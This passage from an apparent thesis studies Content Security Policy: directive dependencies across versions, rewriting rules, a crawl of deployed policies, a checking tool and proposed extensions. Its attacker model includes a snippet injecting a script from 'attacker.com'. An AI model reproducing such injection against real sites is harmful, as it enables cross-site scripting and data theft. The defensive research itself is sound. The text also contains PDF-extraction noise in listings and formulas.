we propose the following order in applying the rewriting rules.

— The first 5 rules (R1, R2, R3, R4, R5) can be applied in any order. They are indepen-

dent from one another.

— Resolve the dependency between plugins and plugin types directives, by applying R8.

— Then apply rules related to scripts execution. R9, R10, R11 . Then fix the values

— Then apply R7, for workers, then R6for frames.

The rule of thumb applies here. When a directive is modified, then fix its value and no

longer alter it in subsequent rules.

One of the rewriting options we propose in rules R6, R7, R9is to assign the set of directives

under consideration (frame-src and child-src in the case of R6), a new set of values,

computed as the union of the values of all the directives or a subset of them. We recommend

to always compute the union of all of the directives in the set, instead of selecting only

a subset of them. Even though the resulting CSP may be more permissive, at least it

preserves the semantics of the policy, and does not break the application.

Correctness

Dependencies D2, D3, D4, D5are related to the sandbox directive. The rewriting rules

R2, R3, R4, R5strictly follow from the specification [261,272,275] and the semantics of

sandbox [76]. Applying these rules does not modify the semantics of a policy and is com-

pliant with CSP specification. Since most browsers do not properly support the sandbox

directive, implementing our rewriting rules can help them comply with the specification

regarding this directive and its influence on other directives. Developers can also apply

these rules to their policies prior to deploying them, in order to ensure that the sandbox

directive will be correctly enforced in all browsers, with respect to its influence on other

directives.

The remaining rules are meant as guidelines for developers willing to build policies which are

dependency-free, and with equivalent semantics in all browsers. Dependency D1concerns

directives which are not backwards compatible with the different CSP versions. In other

words, they do not have equivalence in all versions of the specification, meaning they will

be ignored in such versions. These directives should not set any restrictions on the type

of content they are related to, as suggested in R1. Basically, a policy should not set

restrictions on forms, application manifests, etc.

R6ensures that restrictions on frames are the same in all versions of CSP. R7concerns

workers. R8relates to the fact that plugin-types directive is not supported in all versions

of the specification. The best solution is not to use this directive at all in a policy. R9

ensures that restrictions set on plugins are not permissive than those on scripts, since

(Flash) plugins could execute additional scripts in some browsers, and not in others. R10

ensures that when normal scripts execution is not allowed, plugins cannot load either.

Otherwise, in some browsers, plugins could still make connections, load workers, while in

other browsers, this would not be the case. Finally, R11 ensures that when stylesheets

cannot load, fonts cannot load either. Otherwise, if scripts execution is enabled, fonts can

still load in some browsers, while in others this would not be the case.

PUT(0,-845.90042)

3. DIRECTIVES DEPENDENCIES 69

Example of dependency-free policies

To summarize, a dependency-free policy is a policy which

— does not set any restriction on, frame-ancestors,base-uri,plugin-types,manifest-src.

— either prevents forms submission or allow forms submission to any origin.

— applies the same restrictions on frames directives (frame-src,child-src) and work-

ers directives (script-src,child-src, and worker-src).

— when stylesheets are not allowed, fonts should not also be allowed. Otherwise scripts

can load fonts.

—object-src directive should be less or as permissive as the script-src directive.

Otherwise, plugins can execute additional scripts in browsers supporting Flash.

Below are examples of DF-CSP policies.

default-src t ru s te d . c om ;

manifest-src *;

Listing 4.5 – Policies should not set any restriction on manifests, and other backwards

incompatible directives

scr i p t- s rc ’ s e lf ’ t r us t ed . c om ;

chi l d -s r c ’s e l f ’ t r us t ed . c o m ;

fra m e -s r c ’s e l f ’ t r us t ed . c o m ;

wor k e r- s rc ’ s e lf ’ t r us t ed . c om ;

obj e c t- s rc t r us t ed . c om ;

Listing 4.6 – Scripts, frames, and workers should have the same restrictions. Plugins

directive should be less permissive than the scripts directive

sandbox allow-forms;

obj e c t- s rc ’ n o ne ’ ;

scr i p t- s rc ’ n o ne ’ ;

chi l d -s r c ’n o n e ’ ;

wor k e r- s rc ’ n o ne ’ ;

fra m e -s r c ’n o n e ’ ;

form-action *;

Listing 4.7 – Sandbox prevents plugins and scripts execution. So, frames and workers

should also be prevented. ’self’ should not be used in directives values. Forms can

be submitted to any origin

sty l e -s r c ’n o n e ’ ;

font-src ’ n on e ’

Listing 4.8 – Policies should explicitly prevent fonts when stylesheets are not allowed

3.5 Dependencies between CSP2 and CSP3 implementations

We want to assess how the dependencies and rewriting rules change if we consider only

CSP2 and CSP3. In fact, CSP2 has a lot in common with CSP3, and we are not aware

of any modern browser fully supporting CSP1. A scenario in which only CSP2 and CSP3

are considered is more realistic, and representative of current CSP implementations by

browsers in the wild [21].

The changes are the following w.r.t dependencies and rewriting rules for the versions (CSP1,

CSP2, CSP3) presented in Table 4.5.

PUT(0,-845.90042)

70 CHAPTER 4. DEPENDENCY-FREE CSP

(D1)v=−→

d↓manifest-src ⇒v={∗}

(D4)sandbox v∈−→

d∧allow-forms /∈v∧v0=−→

d↓form-action ⇒v0={’none’}

(D7)v=−→

d↓child-src ∧v0=−→

d↓worker-src ⇒v=v0

(R1)if −→

d↓manifest-src 6={∗} then −→

d↓manifest-src ={∗}

(R4)if sandbox v∈−→

dand allow-forms /∈v, then −→

d↓form-action ={’none’}

(R7)T={child-src,worker-src}, t1, t2∈T, v1=−→

d↓t1and

v2=−→

d↓t2.∀t∈T, −→

d↓t=v1∪v2

Table 4.5 – Dependencies and rewriting rules considering only CSP2 and CSP3 and their

implementations in browsers

— Only the manifest-src directive of CSP3 is backwards incompatible, since it does

not have an equivalence in CSP2. So, D1and R1are changed to contain only this

directive.

— Since form-action is part of CSP2 and CSP3, therefore D4and R4are modified

accordingly. Specifically, the form-action directive is set to {’none’} if the sandbox

directive is present and does not include the allow-forms value.

—script-src directive is no longer linked to workers. The directives related to work-

ers are child-src, and worker-src in CSP2 and CSP3 respectively. Therefore,

script-src is removed from D7and R7.

— Other dependencies (See Table 4.3) and rules 4.4 remain unchanged.

From the examples of DF-CSP presented in Section 3.4, only the policy shown in Listing 4.7

changes as show in the example below.

sandbox allow-forms;

obj e c t- s rc ’ n o ne ’ ;

scr i p t- s rc ’ n o ne ’ ;

chi l d -s r c ’n o n e ’ ;

wor k e r- s rc ’ n o ne ’ ;

fra m e -s r c ’n o n e ’ ;

form-action ’ s el f ’ t ru s te d . c om ;

The form-action directive is no longer limited to {∗} when the sandbox directive is speci-

fied with allow-forms. It can take any set of trusted origins, while still making the policy

DF-CSP.

3.6 Dependencies between CSP2 and CSP3 specifications

In previous sections, we focused on the differences in CSP specifications as well as the pecu-

liarities of their implementations in browsers. For instance, the dependencies and rewriting

rules take into consideration the fact that Firefox does not support the plugin-types di-

rective. Here, we consider only CSP2 and CSP3, as they are described in the specification,

and discuss the dependencies and rewriting rules in this scope only. Table 4.6 presents the

modifications that this implies in the original dependencies and rewriting rules presented

in Tables 4.3 and 4.4

— The changes in dependencies D1, D4, D7, and the related rewriting rules R1, R4, R7

are the same as described in Table 4.5 for the case where CSP2 and CSP3 are con-

sidered as well as their implementations in browsers.

PUT(0,-845.90042)

3. DIRECTIVES DEPENDENCIES 71

(D8)v=−→

d↓plugin-types, v0=−→

d↓object-src. v ={’none’} ⇒ v0={’none’}

(D9)v=−→

d↓object-src ∧v0=−→

d↓script-src ⇒v⊆v0

∨(plugin-types v00 ∈−→

d∧application/x-shockwave-flash /∈v00)

(D10)v=−→

d↓object-src ∧v0=−→

d↓script-src ∧v0={’none’} ⇒ v={’none’}

∨(plugin-types v00 ∈−→

d∧application/x-shockwave-flash /∈v00)

∨(∀t∈ {connect-src,worker-src,child-src}, v000 =−→

d↓t∧v000 ={’none’})

(D11)v1=−→

d↓style-src, v2=−→

d↓font-src, v3=−→

d↓script-src, v4=−→

d↓object-src.

v1={’none’} ⇒ v2={’none’} ∨ (v3={’none’}

∧(v4={’none’} ∨ (plugin-types v∈−→

d∧application/x-shockwave-flash /∈v)))

(R8)v=−→

d↓plugin-types, v0=−→

d↓object-src.if v={’none’} ∧ v06={’none’}then

(∃v00 6={’none’} ∧ −→

d↓plugin-types =v00)∨−→

d↓object-src ={’none’}

(R9)v=−→

d↓script-src, v0=−→

d↓object-src, v00 =−→

d↓plugin-types.if v⊂v0then

−→

d↓plugin-types =v00 − {application/x-shockwave-flash}

∨−→

d↓object-src ={’none’} ∨ −→

d↓object-src =v∩v0

∨ ∀t∈ {script-src,object-src}, v1, v2∈ {v, v0},−→

d↓t=v1∪v2

(R10)v=−→

d↓script-src, v0=−→

d↓object-src, v00 =−→

d↓plugin-types.

if v={’none’}then −→

d↓object-src ={’none’}

∨−→

d↓plugin-types =v00 − {application/x-shockwave-flash}

∨ ∀t∈ {child-src,worker-src,connect-src},−→

d↓t={’none’}

(R11)v=−→

d↓script-src, v0=−→

d↓object-src, v00 =−→

d↓plugin-types.

if −→

d↓style-src ={’none’}then −→

d↓font-src ={’none’}

∨((−→

d↓plugin-types =v00 − {application/x-shockwave-flash}

∨−→

d↓object-src ={’none’})∧−→

d↓script-src ={’none’})

Table 4.6 – Dependencies and rewriting rules for CSP2 and CSP3, according to the speci-

fications. We consider only browsers which implementations are compliant with the speci-

fications

— According to the specification, when no specific type of plugins is allowed, then

plugins themselves are not allowed. Normally, the specification requires that the

plugin-types directive always specify at least one value when it is included in a

policy [275]. But nothing prevents one from adding no values to this directive, making

it {’none’}. When it is the case, then plugins (object-src) are not allowed to

execute. D8and R8are modified accordingly.

— Regarding scripts execution via plugins, since only Flash plugins can execute scripts,

the plugin-types directive does not include a dependency, unless it explicitly allows

Flash plugins (application/x-shockwave-flash), or it is absent (which means that

any type of plugins is allowed). This consequently changes dependencies D9, D10, D11

and rewriting rules R9, R10, R11 that describe the fact that plugins can execute

scripts, and therefore make connections, load workers or fonts.

Other directives are unchanged.

Below are examples of DF-CSP in CSP2 and CSP3 specifications, assuming that they are

correctly implemented by browsers.

PUT(0,-845.90042)

72 CHAPTER 4. DEPENDENCY-FREE CSP

Table 4.7 – Dependencies in the wild, considering CSP1, CSP2, CSP3 and their implemen-

tations in browsers.

Dependency #Pages #Origins #Sites

D1134,339 (60.61%) 6,282 3,814

D223 5 5

D343 1 1

D449 2 2

D543 1 1

D648,068 (21.69%) 1,726 1,302

D771,161 (32.11%) 2,888 2,076

D8206 8 8

D926,739 (12.08%) 905 695

D10 0 0 0

D11 0 0 0

scr i p t- s rc ’ s e lf ’ ;

obj e c t- s rc * ;

plugin-types a pp l i ca t i on / p d f ;

This policy allows scripts from the page own origin, and plugins from any origin. Nonethe-

less, only PDF plugins are allowed, and not Flash which can execute scripts. This policy is

DF-CSP, according to CSP2 and CSP3 specifications, even though the object-src directive

is more permissive than the script-src directive.

4 Dependencies in the wild

We collected and analyzed the CSP of pages from top 100k Alexa sites, in order to as-

sess the prevalence of dependencies (Table 4.3). To collect CSP, we used SlimerJS [130] on

Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0.

We visited the homepages, and also links that we found on the homepage, pointing to the

site or its subdomains.

To analyze policies, we implemented a tool with a full CSP parser according to the speci-

fication [275] (for checking whether a directive allows a URL to load). It can compare the

permissiveness of 2 policies, and detect when one CSP directive allows more origins than

the other [255]. It can also detect dependencies as discussed in this work.

We found 221,638 pages deploying CSP. They are spread over 18,673 origins from 13,226

sites out of 100k Alexa sites (13.22%). Policies with dependencies (for the scenario where

all CSP versions and browsers implementations are considered) are presented in Table 4.7.

As one can observe from Table 4.7, the most prevalent reason why policies are not DF-CSP

is because of D1, which relates to the use of backwards-incompatible directives in policies.

Recall that the mere presence of these directives in a policy introduces dependencies, when

they do not have their equivalence in other versions of the specification. Hence, 60.61%

of the CSP deployed use directives (frame-ancestors,base-uri,manifest-src). They

are not known to all versions of CSP. This result also include policies which set to the

form-action directive, values which are not {’none’}nor {∗}. Since this directive is not

part of CSP1, restrictions set on it get ignored, leading to dependencies.

Another dependency widely present in policies is D7, which concerns workers. It has 3

different directives, one per CSP version (script-src,child-src,worker-src). Hence,

32.11% of the policies we have analyzed do not set the same restrictions on the workers

PUT(0,-845.90042)

5. TOOL FOR BUILDING EFFECTIVE POLICIES 73

directives.

As the results show for D6, 21.69% of the policies deployed set different restrictions on the

frames directives (frame-src,child-src).

We found 12.08% of pages allowing scripts executions via (flash) plugins (object-src),

from origins not whitelisted in the script-src directive.

Some 206 pages use the plugin-types directive, which results in different enforcement

because the directive is not supported in CSP1 and Firefox. The results show that the

sandbox (D2, D3, D4, D5) is not widespread among policies. In particular, a single site is

making use of sandbox directive, without allow-same-origin, but with ’self’ in its CSP

directives values (D5). Finally, we found no policy in which scripts (script-src) are not

allowed, and allow workers and connections via plugins (D10). Nor did we find policies

which do not allow stylesheets, and allow fonts to be loaded via scripts (D11).

4.1 Validity of the statistics

A criticism that could be directed to the results presented here would be about their

validity, because we collected the policies using a specific browser. In particular, if indeed

a web server checks the User-Agent string to send a specific CSP, then for all the requests,

it is clear that we have obtained a policy for Mozilla/5.0 (X11; Fedora; Linux x86_64;

rv:57.0) Gecko/20100101 Firefox/57.0. However, this exactly means that the related

server is not maintaining a single policy, but rather multiple policies, one per browser. This

implies that the policy we obtained from the server is not DF-CSP. Otherwise, if the policy

sent by the server is the same for any browser, then it is not DF-CSP, according to our

analysis. Therefore, all the results reported here are valid, even though the server served

a specific CSP based on the User-Agent string we sent during the crawling process.

5 Tool for building effective policies

The main goal of the tool is to assist developers in building effective policies. It is able

to detect common errors reported by Calzavara et al. [177], resolve dependencies, reduce

policies by removing semantic redundancies in directive values, and provide the semantics

of the policy. The tool also checks that policies are well-formed as specified in Section 3.1.

To do so, it removes unknown directives and their values; removes unknown directive values

keeping only those allowed by the specification; removes duplication of directives keeping

only the first occurrence; expands policies by explicitly adding directives which fallback to

default-src, by explicitly adding them in the policy, when the directive is missing and

default-src is present. Building a single policy from a conjunction of multiple policies is

achieved by computing the intersection of the set of whitelisted origins of each directive in

both policies. Check out the tool here5.

All of its features are described below for the dependencies and rewriting rules in Tables 4.3

and 4.4 for all the versions of CSP.

Errors and misconfigurations This includes misspelled directive names or values (i.e

defalt-src instead of default-src), quoting (using double quotes instead of single one

for ’self’, or not quoting values when they should be quoted), and missing colon after

a scheme name (https instead of https:) [177]. For all these cases, the tool suggests

changes to the developer. To make a suggestion, we compute the Levenshtein distance6

5. https://swexts.000webhostapp.com/dependencies/

6. https://en.wikipedia.org/wiki/Levenshtein_distance

PUT(0,-845.90042)

74 CHAPTER 4. DEPENDENCY-FREE CSP

between known directive names and values and misspelled ones. Then the suggestions are

shown to the developer who can change the policy accordingly. The list of directive values

that should be quoted is given by CSP specification (’self’,’none’, nonces, hashes,

’strict-dynamic’). Other values (origins, schemes, and sandbox directive flags) should

not be quoted. Only single quotes are accepted in the specification. The tool also ensures

that schemes always end with a colon (https:), otherwise suggestions are made to the

developer to fix them.

Dependencies Directives dependencies are described in Section 3. The tool detects and

proposes to resolve them. For instance, when scripts are specified, while the sandbox

directive does not include the allow-scripts flag, this is detected as a dependency is-

sue, and it is suggested to the developer to either allow scripts execution by adding the

allow-scripts flag to the sandbox directive, or disallow scripts execution by setting the

script-src directive values to {’none’}. Other dependencies are treated similarly.

It is worth mentioning the ability of executing scripts with Flash plugins. So, whenever

object-src directive can be used to execute scripts from additional origins not included

in the script-src directive (using Flash), the tool would suggest to either remove the

additional origins from the object-src directive or simply set its value to ’none’ [267],

or remove from it the additional origins not whitelisted in script-src directive, etc (See

Table 4.4 for more details).

Semantics The tool generates the semantics of the policy, which is all the origins from

which content can be loaded for each type of content according to the CSP. In particular,

the default-src directive is expanded by adding directives which fallback to it when

they are not clearly specified. Any other missing directive (which does not fallback to

default-src) is explicitly added, as allowing any content of the related type to load.

Redundancies The tool is also able to detect origins redundancies in the policy, and

suggest to developers to remove them, in order to improve the clarity and maintainability

of the policy. For instance, the origin *.example.com covers www.example.com. When

those 2 origins are whitelisted, the tool suggests to only keep the first one.

6DF-CSP and strict CSP

In this section, we discuss the use of the keyword ’strict-dynamic’ in backwards com-

patible policies such as DF-CSP. To improve the protection of an application deploying CSP

in backwards compatible fashion, we propose that web applications always accompany a

nonce-based policy that makes use of ’strict-dynamic’, with an origin-based policy to

further limits an attacker’s power. This policy is not a new policy, but one which is auto-

matically generated from a policy that makes use of ’strict-dynamic’. The second policy

is exactly the same as the first one, except that it does not include the ’strict-dynamic’

keyword.

One can still benefit from ’strict-dynamic’, by enabling whitelisted scripts to further

load all their dependencies (additional scripts), without having to set individual nonces or

hashes to these dependencies. When the policy is enforced in a CSP2 or CSP1-compliant

browser, all the dependencies can still load thanks to the origins (CSP1) and/or nonces

(CSP2). Regardless of the version of CSP supported by the browser, an attacker who

manages to compromise a trusted script, cannot load more scripts than what is declared in

the origin-based policy. In fact, browsers will enforce both policies. A content is allowed

PUT(0,-845.90042)

6. DF-CSP AND STRICT CSP 75

to load if it is allowed by both policies. Since the origin-based policy clearly states the

origins from which trusted scripts can load, the attacker can then only load content from

these origins, which are anyway already trusted.

6.1 Attacker model

The attacker here is able to control the URLs of non-parser scripts dynamically injected

from a trusted script [267,272]. Below is an example of a dynamic script execution.

script =document.createElement(" script") ;

scr i p t. s rc =" h t tp : / / at t a ck e r. c o m / x. j s "

document.body.appendChild(script)

We consider that the attacker can control the value of the src attribute of the dynamically

injected script. For instance, this URL is retrieved from a database, or as a result of any

XSS attack.

6.2 Design

To deploy multiple CSPs, one simply separate them with commas. Hence, the single policy

in Listing 2.1 is rewritten in two policies as follows:

scr i p t- s rc ’ s t r i ct - d y n am i c ’ ’ n o nc e - a bc d e f ’ ’ s e l f ’ https://

t ru s te d . c om ; o b j ec t -s r c ’n o n e ’ ;,

scr i p t- s rc ’ n o n c e- a b c d ef ’ ’ s el f ’ h tt p s: / / t ru s te d . c om ; o b j ec t - sr c

’ n on e ’ ;

The first policy is exactly the same as the one in Listing 2.1. The second one is also exactly

the same except that it does not have the keyword ’strict-dynamic’ in its script-src

directive. The second policy is automatically generated from the first one, which when

deployed together successfully provide the same protection against attacks. Let’s stress

again that the second policy is automatically generated from the first one, as we will

demonstrate below. This is the sole difference between the two policies. Regarding only

the script-src directive, in CSP3, the 2 policies ’strict-dynamic’ ’nonce-abcdef’

https://trusted.com and ’nonce-abcdef’ ’self’ https://trusted.com will be en-

forced. Even if an attacker manages to compromise a script, he cannot inject arbitrary

content, because of the second script, which binds the origins of trusted script to only

’nonce-abcdef’, ’self’ and https://trusted.com. This is exactly the same protec-

tion provided in CSP1 and CSP2 when the two policies are both enforced. This design helps

preserve the protection of the application across browsers supporting different versions of

CSP, and more importantly, helps prevent attackers from injecting arbitrary content when

they get to compromise a trusted script, in particular in CSP3-compliant browsers.

6.3 Applications vulnerable to such attacks

We performed an analysis of the CSP policies from top 100k Alexa sites, to assess how

websites using ’strict-dynamic’ are protected against such attacks. Our results show

that ’strict-dynamic’ is not very widespread. We found the use of this keyword in the

CSPs of pages from 24 different origins. Among those, only https://www.dropbox.com

and https://earn.com deployed a policy set consisting of 2 policies. All other origins were

vulnerable to this attack. It is worth noting that among those sites, 7 of them deployed

very liberal policies, by allowing https:, http: schemes in the script-src directive [177].

This already allows attackers to inject arbitrary content in CSP1 or CSP2. This implies

PUT(0,-845.90042)

76 CHAPTER 4. DEPENDENCY-FREE CSP

that the attacker already gains the same power in all versions of the specification for these

websites.

7 Conclusion

Following the success of CSP1 and CSP2, the W3C is currently actively working on the

next version of the specification, CSP3. Each version builds on the previous one, with

changes aimed at improving the security and ease of adoption by developers. In this work,

we have highlighted and addressed the semantics and security challenges related to the

changes introduced in each version of the specification, in particular when a single policy

has to be enforced in different browsers providing implementations which are not always

compliant with the specification. We formalize the differences between the specifications

as dependencies, and propose a set of rewriting rules for building dependency-free policies

(DF-CSP). To the best of our knowledge, this work is the first comprehensive study of CSP

dependencies and the first to propose a tool for resolving these dependencies in order to

obtain effective CSP policies.

PUT(0,-845.90042)

Chapter 5

Extending CSP: Blacklisting, URL arguments

Filtering and Monitoring

Preamble

This chapter presents proposals for extending the CSP specification to address different

limitations of CSP that have been demonstrated in the literature or identified by us. In

particular, we propose and implement a blacklisting mode to CSP, a mechanism for filtering

URLs parameters, prevent redirections and an efficient reporting mechanism for collecting

feedback about the runtime enforcement of CSP.

This chapter has been submitted for review.

1 Introduction

Previous studies have demonstrated the limitations of CSP as a whitelisting mechanism,

and the attacks that can be mounted to bypass CSP [212,267]. To illustrate these limita-

tions, we pose the following research questions regarding important security requirements

for an application.

How do we effectively whitelist a precise set of trusted content from a domain

?In this scenario, a developer does not trust a whole third party domain, but only a

specific content, or set of content. CSP makes it possible to express this by partially

whitelisting an origin. In other words, instead of declaring the whole (third party) origin

in a policy, one declares only the specific trusted content or set of content from the domain.

As such, the origin is partially whitelisted, and only the whitelisted content are allowed to

load. Nonetheless, by using HTTP redirections, any content from the partially whitelisted

origin can be loaded [272,275]. In particular, when the CSP whitelists origins that host

insecure open redirects endpoints, the CSP can be bypassed by loading any content from

the partially whitelisted origin, as if the origin was fully whitelisted [267].

How do we exclude an untrusted content from a whitelisted origin ? In this

second scenario, the developer needs to whitelist an origin but exclude a specific content

or set of content that it hosts. For instance, the content to exclude is an untrusted content

known for introducing a threat in the application. This is the case of the popular AngularJS

JavaScript library [8]. Weichselbaum et al. [267] reported that it allows to execute arbitrary

scripts in a webpage, despite CSP. Another case we found interesting is a webpage that loads

PUT(0,-845.90042)

78 CHAPTER 5. EXTENDING CSP

scripts from its own origin and also from a third party domain. However, the developer

may want to prevent the third party from loading scripts located at the developer’s website

under the path /admin/ because it contains sensitive scripts. The developer may also want

to prevent the third party script from discovering that there is a user logged into the

current web application. In fact, in a recent study, Gulyás et al. [198] demonstrated that

by loading a resource such as an image which is only accessible once a user is logged into a

website, a third party script can discover that the user is logged into the website and use

such information for tracking purposes for instance. Unfortunately, CSP does not allow to

blacklist a specific content or set of content of an origin. When an origin is declared in a

policy, it is considered trusted in its entirety.

How do we filter out unsafe URL parameters ? In this scenario, we consider that

an origin is whitelisted, but one would like to ensure that URLs injected in the webpage

do not have parameters. That is, when an origin hosts content which are insecure JSONP

endpoints, URL parameters provided to requests to load such content can be leveraged

by an attacker to execute arbitrary content [212,267]. Bypassing partially whitelisted

origins by HTTP redirections is also done by leveraging parameters of open redirects [267].

Unfortunately, URL parameters are ignored by browsers when they match a URL against

a policy. Additionally, to exfiltrate user data, attackers usually pass them to URLs as

parameters of HTTP requests to load content. Hence, even if a CSP tries to prevent data

exfiltration by restricting the endpoints to which AJAX requests can be made to [275],

attackers can still exfiltrate data by passing them as parameters of URLs of other types of

content, considered less security critical, such as images for instance.

How do we efficiently collect feedback about the runtime enforcement of CSP

in a webpage? A developer would like to know which content are allowed by the CSP

deployed to protect webpages of her application. This feedback can be useful for many

reasons. First, even if an application has been heavily tested, it is not excluded that an

attacker can find a vulnerability and inject malicious content in the application. Moreover,

an error in a CSP may result in the policy being more permissive than expected, allowing

attacker-injected content to load [177]. Furthermore, browser extensions are widespread on

major browsers [24,58,94,108]. In particular, they have the ability to intercept and modify

CSPs deployed to protect webpages, and inject in webpages their own content that is not

always required to comply with the CSP of the page [26,200]. Nonetheless, extensions

content may further inject vulnerabilities in webpages, which are otherwise restricted by

CSP. Finally, the new ’strict-dynamic’ keyword introduced in CSP3 [267,272] allows to

potentially load any script in a webpage at runtime. It makes it impossible to statically

know the content (scripts) that are allowed by a policy before it is effectively enforced in

a browser. Hence, knowing which content is effectively injected in a webpage at runtime

represents a valuable information that can help assess the security of a webpage and deploy

more secure policies.

Weichselbaum et al. [267] proposed the use of nonces to mitigate CSP bypasses based

on open redirects and unsafe JSONP endpoints. However, this solution comes with the

following issues. First, the security of nonces is questionable because they are included in

the DOM of webpages [178,272,275]. Moreover, the use of nonces does not prevent a script

that is already loaded in the webpage from making requests with JSONP parameters, or

from redirecting to partially whitelisted origins, especially if the script gets compromised.

Finally, nonces apply only to scripts and stylesheets, and not to other types of content

such as images whose URLs parameters an attacker can leverage to exfiltrate user data for

PUT(0,-845.90042)

1. INTRODUCTION 79

instance. CSP provides a reporting mechanism for developers to collect violations which

occur in browsers during its enforcement [261,272,275]. Violations are triggered by content

not matching the CSP of the page. Ultimately, deploying the most restrictive policy (a

policy that does not allow any content to load) in report-only mode could potentially give

feedback about content that load in an application. This method however is inefficient and

incomplete. In fact, a CSP in report-only mode implies that any content in the webpage

will trigger a violation and browsers will submit a report for each individual violation. If the

webpage loads numerous content, then the reports sent for each content from the browsers

of all the users of the application potentially introduce an overhead from the application

server-side. Moreover, if a violation is triggered, is it because of a trusted content or an

untrusted content ? To distinguish between trusted and untrusted content, one would have

to deploy at least 2 policies, one in report-only mode, the other one in enforcement mode,

collect violations in both cases, and compute the difference to get the content effectively

allowed by the policy. Furthermore, content injected by browsers extensions that are not

subject to the CSP of the page, will not trigger any violation report. Collecting feedback

by using CSP violations is therefore incomplete. Finally, the use of ’strict-dynamic’ in

CSP3 makes it difficult to know in advance the origins from which content in a webpage

will be effectively loaded, before the CSP is enforced.

To fully address the aforementioned issues, we propose to extend the current CSP specifi-

cation.

Adding a blacklisting mode to CSP Currently CSP specification defines 2 modes: the

report-only mode in which policies are enforced, but browsers do not block content not

allowed by the policy; and the enforcement mode in which content that are not allowed by

the policy are effectively blocked. We refer to these two modes as CSP whitelisting modes.

The proposed blacklisting mode is the exact opposite of the enforcement mode: content

that match a CSP in blacklisting mode are blocked, otherwise they are allowed. We propose

to introduce a new header, Content-Security-Policy-Blacklisting for deploying CSP

in blacklisting mode. One would use this mode to exclude specific content or set of content

on a domain from loading in a webpage. CSP in blacklisting mode proves useful when one

knows that the domain hosts content that are potentially malicious and could introduce

further vulnerabilities if loaded in a webpage. This new mode can also serve to explicitly

prevent the loading of sensitive content in a webpage, as they may reveal information

about a logged-in user for instance [198]. The blacklisting mode is meant to be used as a

complement to CSP deployed in either of the whitelisting modes.

Filtering URLs parameters We propose extending the URL matching algorithm of

CSP [275], which is used to check whether a URL is allowed by a policy or not, in order

to take into consideration URL parameters. In the current status of the specification,

URL parameters are considered trusted by default. The proposed extension is to enable

declaring origins, paths, and specific content by specifying the URL arguments that are

trusted or untrusted. This extension is meant to be used with the new CSP blacklisting

mode. If an entire content can already be blacklisted, by filtering URL parameters, one can

further blacklist content when they are injected in webpages with URLs that have specific

unsafe parameter names, parameters with unsafe values, or even prevent URLs with any

parameters. The URL filtering mechanism perfectly fits requirements where one wants to

ban URLs arguments of requests to insecure JSONP endpoints, open redirects endpoints,

or prevent data exfiltration via URL parameters.

Disallowing redirections to partially whitelisted origins The CSP bypass due to

partially whitelisted origins can already be mitigated with the 2 previous proposals. In

fact, if one identifies the open redirects endpoints of origins whitelisted in a policy, they

PUT(0,-845.90042)

80 CHAPTER 5. EXTENDING CSP

can either be blacklisted or their URL parameters filtered in order to prevent them from

redirecting to partially whitelisted origins. Nonetheless, one has to ensure that all open

redirects endpoints are identified and blacklisted. Otherwise, it is sufficient that an end-

point be missed to leave the whole CSP bypassable. We propose to introduce a new direc-

tive disallow-redirects that can be used in policies to instruct the browser to prevent

all redirections to partially whitelisted origins. In the current CSP URL matching algo-

rithm [275], browsers would allow loading any content from a partially whitelisted origin if

the content is the result of an HTTP redirection [272,275]. This new directive is meant to

alter this precise part of the algorithm: when it is used in a policy, browsers should prevent

from loading, any content not explicitly whitelisted on a partial origin. This ensures that

once an origin is partially whitelisted, browsers strictly enforce it.

Efficient feedback reporting mechanism Finally, we propose extending CSP with an

efficient reporting mechanism for content that match a policy, similarly to CSP violations

reports. While a browser enforces a policy, it can keep track of all content matching the

policy, and report this information to an endpoint specified in the CSP of the page. To

specify the endpoints for collecting feedback, we introduce the directives monitor-uri and

monitor-to, similar to the report-uri and report-to directives currently used for col-

lecting violations. To make the mechanism efficient, reports may be sent after all content

are loaded and the page enters a stable state. Content injected thereafter could be submit-

ted at regular intervals according to a delay defined by the browser. The web application

developer can analyze this feedback, and look for potentially malicious content that loaded

because of errors or misconfigurations in the policy, content injected by browser extensions,

or dynamic content loaded by scripts when the ’strict-dynamic’ keyword is used in a

CSP. Therefore, the policy can be updated to improve its effectiveness.

As we have shown, these extensions improve on previous proposals for fighting against

CSP bypasses. Nonces that have been proposed to mitigate JSONP and open redirects

have been criticized in the literature, mostly because they are included in the DOM of web

applications, and attackers can use scriptless attacks to read nonces and inject arbitrary

content [178]. Filtering URLs parameters can be applied to URLs to prevent data exfil-

tration, JSONP, and open redirects by mandating that URLs of requests cannot carry any

arguments, or specific arguments. Using CSP violations reporting mechanism to get a feed-

back, is inefficient and incomplete, it introduces an overhead, and requires the deployment

of 2 policies.

To further show that the proposed extensions require few changes from a browser perspec-

tive, we implemented them using service workers in an example web application. Service

workers (we refer to them as a monitor) intercept HTTP requests initiated by browsers

to load content in a webpage. As such, they act like a proxy for content included in the

page [149]. We deploy a service worker with an example web application, which deploys

a CSP in enforcement mode and another policy in blacklisting mode. The CSP in black-

listing mode is enforced by the monitor, and the CSP in whitelisting mode is enforced by

the browser. Once the URL of a content matches a policy, the browser makes a request

to fetch its content. Then, the request is sent to the service worker, which further checks

its URL against the blacklisting policy. If the URL matches the blacklisting policy (ei-

ther because it is a blacklisted content or carries untrusted arguments), then the request

is blocked, otherwise it is effectively made. For open redirects, as HTTP redirections are

not intercepted by service workers for security reasons [275], we could not fully implement

the new disallow-redirects directive. Nevertheless, to prevent redirections to partially

whitelisted origins, we assumed that all open redirects are known by the developer. Then

we either used the new blacklisting mechanism to blacklist the open redirects, or prevented

PUT(0,-845.90042)

2. PROBLEM AND MOTIVATION 81

them from carrying URL parameters by filtering them out with the new URL parameters

filtering mechanism we introduced. Finally, the monitor also logged all the URLs of con-

tent that it intercepted and reported them to the developer, as a feedback of the runtime

enforcement of CSP.

In summary, this study contributes with four new extensions to the Content Security

Policy. It aims at improving the security of web applications, by (i) expressing policies

in blacklisting mode, (ii) filtering URL arguments, (iii) disallowing redirects to partially

whitelisted origins and finally (iv) providing developers with an efficient way for collecting

feedback about the runtime enforcement of their policies in an application.

2 Problem and motivation

For the sake of simplicity and throughout the rest of this work, we describe in more

details the issues we addressed by considering mostly the script-src directive, which

sets restrictions on the origins from which trusted scripts can load. Nonetheless this work

is more general, and concerns CSP as a whole, its other directives and content types. To

illustrate the limitations of CSP and motivate our proposals, we consider the following

policies.

scr i p t- s rc h tt p s: / / tr us te d . co m h tt ps : // r e di re c t. c om h tt ps : //

p ar t ia l s . c om / s c ri p t s /;

